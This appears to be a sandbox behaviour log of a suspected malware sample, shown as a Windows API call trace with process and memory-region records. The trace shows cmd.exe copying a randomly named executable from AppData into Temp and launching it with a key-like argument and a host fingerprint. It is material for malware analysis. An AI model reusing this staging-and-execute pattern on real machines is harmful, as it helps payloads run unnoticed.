[0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.159] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.159] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.159] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.159] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.159] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.183] _close (_FileHandle=4) returned 0 [0107.183] FindNextFileW (in: hFindFile=0x350f78, lpFindFileData=0x26f1b0 | out: lpFindFileData=0x26f1b0) returned 0 [0107.183] GetLastError () returned 0x12 [0107.183] FindClose (in: hFindFile=0x350f78 | out: hFindFile=0x350f78) returned 1 [0107.184] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0107.187] _close (_FileHandle=3) returned 0 [0107.187] GetConsoleTitleW (in: lpConsoleTitle=0x26f64c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.187] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe\"")) returned 0xffffffff [0107.187] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0107.187] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0107.187] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0107.187] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0107.187] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0107.187] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0107.187] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0107.187] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0107.187] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0107.187] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0107.187] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0107.187] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0107.187] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0107.188] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0107.188] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0107.188] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0107.188] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0107.188] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0107.188] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0107.188] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0107.188] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0107.188] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0107.188] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0107.188] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0107.188] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0107.188] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0107.188] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0107.188] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0107.188] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0107.188] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0107.188] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0107.188] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0107.188] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0107.188] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0107.188] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0107.188] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0107.188] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0107.188] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0107.188] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0107.188] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0107.188] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0107.188] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0107.188] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0107.188] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0107.188] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0107.188] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0107.188] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0107.188] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0107.189] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0107.189] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0107.189] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0107.189] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0107.189] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0107.189] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0107.189] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0107.189] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0107.189] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0107.189] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0107.189] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0107.189] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0107.189] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0107.189] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0107.189] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0107.189] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0107.189] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0107.189] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0107.189] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0107.189] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0107.189] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0107.189] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0107.189] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0107.189] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0107.189] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0107.189] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0107.189] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0107.189] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0107.189] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0107.189] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0107.189] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0107.189] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0107.189] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0107.189] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0107.189] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0107.190] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0107.190] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0107.190] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0107.190] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0107.190] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0107.190] SetErrorMode (uMode=0x0) returned 0x0 [0107.190] SetErrorMode (uMode=0x1) returned 0x0 [0107.190] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3604f0, lpFilePart=0x26f16c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x26f16c*="Temp") returned 0x23 [0107.190] SetErrorMode (uMode=0x0) returned 0x1 [0107.190] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0107.191] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.194] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.194] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", fInfoLevelId=0x1, lpFindFileData=0x26ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ef08) returned 0x3624b0 [0107.194] FindClose (in: hFindFile=0x3624b0 | out: hFindFile=0x3624b0) returned 1 [0107.194] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0107.195] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0107.195] GetConsoleTitleW (in: lpConsoleTitle=0x26f3e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.195] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f268, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f330 | out: lpAttributeList=0x26f268, lpSize=0x26f330) returned 1 [0107.195] UpdateProcThreadAttribute (in: lpAttributeList=0x26f268, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f328, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f268, lpPreviousValue=0x0) returned 1 [0107.195] GetStartupInfoW (in: lpStartupInfo=0x26f224 | out: lpStartupInfo=0x26f224*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0107.196] lstrcmpW (lpString1="\\Wtsk8WxH.exe", lpString2="\\XCOPY.EXE") returned -1 [0107.197] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f2c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f310 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", lpProcessInformation=0x26f310*(hProcess=0x50, hThread=0x4c, dwProcessId=0xca4, dwThreadId=0xca8)) returned 1 [0107.605] CloseHandle (hObject=0x4c) returned 1 [0107.605] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0107.605] GetEnvironmentStringsW () returned 0x362d10* [0107.605] FreeEnvironmentStringsW (penv=0x362d10) returned 1 [0107.605] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0108.595] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f204 | out: lpExitCode=0x26f204*=0x0) returned 1 [0108.595] CloseHandle (hObject=0x50) returned 1 [0108.595] _vsnwprintf (in: _Buffer=0x26f34c, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f210 | out: _Buffer="00000000") returned 8 [0108.595] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0108.595] GetEnvironmentStringsW () returned 0x3624d0* [0108.595] FreeEnvironmentStringsW (penv=0x3624d0) returned 1 [0108.595] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0108.595] GetEnvironmentStringsW () returned 0x3624d0* [0108.595] FreeEnvironmentStringsW (penv=0x3624d0) returned 1 [0108.595] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f268 | out: lpAttributeList=0x26f268) [0108.595] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.595] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0108.595] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.595] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa441ac | out: lpMode=0x4aa441ac) returned 1 [0108.596] _get_osfhandle (_FileHandle=0) returned 0x3 [0108.596] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa441b0 | out: lpMode=0x4aa441b0) returned 1 [0108.596] SetConsoleInputExeNameW () returned 0x1 [0108.596] GetConsoleOutputCP () returned 0x1b5 [0108.596] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0108.596] SetThreadUILanguage (LangId=0x0) returned 0x409 [0108.596] exit (_Code=0) Process: id = "30" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16780" os_pid = "0xc8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4432 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4433 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4434 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4435 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 4436 start_va = 0x4aa20000 end_va = 0x4aa6bfff entry_point = 0x4aa20000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 4437 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4438 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4439 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4440 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 4441 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 4629 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4630 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4631 start_va = 0xa0000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4632 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4633 start_va = 0x2d0000 end_va = 0x336fff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4634 start_va = 0x6f8f0000 end_va = 0x6f8f6fff entry_point = 0x6f8f0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 4635 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4636 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4637 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4638 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4639 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4640 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4641 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4642 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 4643 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 4644 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4645 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4646 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 4647 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 4648 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 4649 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 4650 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 4651 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 4652 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 4761 start_va = 0x1290000 end_va = 0x155efff entry_point = 0x1290000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 48 os_tid = 0xc90 [0107.426] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afaa4 | out: lpSystemTimeAsFileTime=0x1afaa4*(dwLowDateTime=0x7e090cc0, dwHighDateTime=0x1d440a9)) [0107.426] GetCurrentProcessId () returned 0xc8c [0107.426] GetCurrentThreadId () returned 0xc90 [0107.426] GetTickCount () returned 0x25b39 [0107.426] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa9c | out: lpPerformanceCount=0x1afa9c*=16421552096) returned 1 [0107.427] GetModuleHandleA (lpModuleName=0x0) returned 0x4aa20000 [0107.427] __set_app_type (_Type=0x1) [0107.427] __p__fmode () returned 0x76b331f4 [0107.427] __p__commode () returned 0x76b331fc [0107.428] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aa421a6) returned 0x0 [0107.428] __getmainargs (in: _Argc=0x4aa44238, _Argv=0x4aa44240, _Env=0x4aa4423c, _DoWildCard=0, _StartInfo=0x4aa44140 | out: _Argc=0x4aa44238, _Argv=0x4aa44240, _Env=0x4aa4423c) returned 0 [0107.428] GetCurrentThreadId () returned 0xc90 [0107.428] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc90) returned 0x38 [0107.428] 